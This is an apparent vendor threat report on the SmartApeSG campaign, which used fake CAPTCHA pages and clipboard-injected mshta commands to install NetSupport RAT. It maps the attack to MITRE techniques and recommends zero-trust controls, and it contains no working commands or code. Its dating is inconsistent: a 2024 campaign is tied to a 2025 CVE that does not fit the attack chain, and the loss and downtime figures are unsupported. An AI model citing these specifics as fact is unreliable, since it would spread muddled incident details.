SmartApeSG Leverages ClickFix Fake CAPTCHA Pages to Spread NetSupport RAT (2024)
Executive Summary
In November 2024, the SmartApeSG campaign shifted tactics by leveraging ClickFix-style fake CAPTCHA pages to deliver the NetSupport RAT, a powerful remote access trojan. Threat actors compromised websites by injecting malicious scripts that, under specific conditions, displayed convincing 'verify you are human' prompts. Unsuspecting users, influenced by the fraudulent CAPTCHA, executed clipboard-injected commands that downloaded and ran NetSupport RAT on their Windows systems, establishing persistent access via Start Menu shortcuts. The campaign was notable for its adaptation and the regular rotation of malicious infrastructure.
This incident highlights a rising trend of social engineering combined with hands-on-keyboard malware delivery. The use of fake CAPTCHA solutions is proliferating, making traditional email-filter and endpoint controls less effective. Organizations should be aware of evolving attack chains and regularly review user education programs to counter these sophisticated lures.
Why This Matters Now
The SmartApeSG campaign shows how attackers blend social engineering with modern malware delivery, bypassing common security controls. The speed at which this threat actor adapts, plus the rise of similar web-based RAT infections, makes this an urgent risk for enterprises and individuals who may unwittingly facilitate a persistent breach.
Attack Path Analysis
The SmartApeSG campaign lured users to compromised sites showing a faux CAPTCHA; upon interaction, malicious scripts delivered NetSupport RAT via clipboard injection and mshta execution (Initial Compromise). The RAT established persistence under the user's profile but did not escalate privileges (Privilege Escalation). Once established, the RAT stage could facilitate lateral movement by attempting connections to adjacent hosts or services (Lateral Movement). NetSupport RAT maintained a persistent C2 channel over outbound HTTPS (Command & Control). The RAT potentially enabled exfiltration of data or credentials (Exfiltration). The campaign’s impact included persistent remote access, data exposure, and enabling further malicious actions (Impact).
Kill Chain Progression
Initial Compromise
Description
Users visited compromised websites with injected scripts leading to fake CAPTCHA pages, which injected malicious commands via clipboard and instructed the user to execute them, resulting in NetSupport RAT installation.
Related CVEs
CVE-2025-34181
CVSS 8.7A path traversal vulnerability in NetSupport Manager versions prior to 14.12.0001 allows attackers with a valid Gateway Key to write arbitrary files to server locations, potentially leading to remote code execution.
Affected Products:
NetSupport Ltd. NetSupport Manager – < 14.12.0001
Exploit Status:
proof of conceptReferences:
MITRE ATT&CK® Techniques
Spearphishing Link
User Execution: Malicious Link
Command and Scripting Interpreter: Windows Command Shell
Signed Binary Proxy Execution: MSHTA
Scheduled Task/Job: Scheduled Task
Boot or Logon Autostart Execution: Shortcut Modification
Ingress Tool Transfer
Remote Access Software
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Protection from malicious software
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – Phishing Resistance and User Awareness
Control ID: User: Phishing and Social Engineering Resilience
NIS2 Directive – Incident Prevention, Detection, and Response
Control ID: Art. 21(2)(a)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
NetSupport RAT infections bypass traditional perimeter defenses, compromising sensitive financial data through ClickFix social engineering and requiring enhanced egress security controls.
Health Care / Life Sciences
Remote access trojans threaten HIPAA compliance by enabling data exfiltration and lateral movement across healthcare networks, demanding zero trust segmentation implementation.
Information Technology/IT
SmartApeSG campaign exploits compromised websites and clipboard injection techniques, requiring multicloud visibility and inline intrusion prevention systems for effective detection.
Government Administration
Command and control infrastructure enables persistent access to government systems, necessitating enhanced threat detection capabilities and secure hybrid connectivity measures.
Sources
- SmartApeSG campaign uses ClickFix page to push NetSupport RAT, (Wed, Nov 12th)https://isc.sans.edu/diary/rss/32474Verified
- NetSupport RAT: The RAT King Returnshttps://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.htmlVerified
- NetSupport Manager RAT Spread via Fake Updateshttps://www.securityweek.com/netsupport-manager-rat-spread-fake-updates/Verified
- Exploring New Techniques of Fake Browser Updates Leading to NetSupport RAThttps://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Layered Zero Trust controls including network segmentation, egress policy enforcement, inline intrusion prevention, and traffic visibility would have restricted infection pathways, detected the RAT's C2 activities, and minimized lateral movement risk. Enforcing these measures across cloud/hybrid and user access would meaningfully limit or stop the SmartApeSG kill chain.
Control: Threat Detection & Anomaly Response
Mitigation: Suspicious clipboard or mshta activity and anomalous outbound web requests would trigger detections and alerts.
Control: Zero Trust Segmentation
Mitigation: Workload segmentation restricts what the initial infected process can access, containing persistent threats.
Control: East-West Traffic Security
Mitigation: Unapproved lateral SMB, RDP, or API communications are blocked and logged.
Control: Egress Security & Policy Enforcement
Mitigation: Unapproved outbound connections to malicious FQDNs/IPs are blocked or alerted.
Control: Cloud Firewall (ACF)
Mitigation: Outbound sessions to unapproved destinations and unusual data flows are blocked.
Integration of threat intel, runtime observation, and automated quarantine contain the threat.
Impact at a Glance
Affected Business Functions
- IT Operations
- Data Security
- Compliance
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data, including intellectual property and customer information, due to unauthorized remote access facilitated by NetSupport RAT.
Recommended Actions
Key Takeaways & Next Steps
- • Implement strict egress filtering and FQDN allow-lists to prevent unauthorized C2 communication from cloud or hybrid endpoints.
- • Deploy Zero Trust Segmentation and East-West Traffic Security to contain RAT movement and minimize lateral exposure.
- • Operationalize Threat Detection & Anomaly Response to catch anomalous clipboard, mshta, and web activity indicative of phishing or RAT delivery.
- • Employ distributed cloud firewalls and inline IPS signatures for early detection and blocking of known RAT artifacts and malicious downloads.
- • Continuously review and baseline all workload-to-workload traffic, harnessing multicloud visibility to rapidly identify and isolate compromised assets.
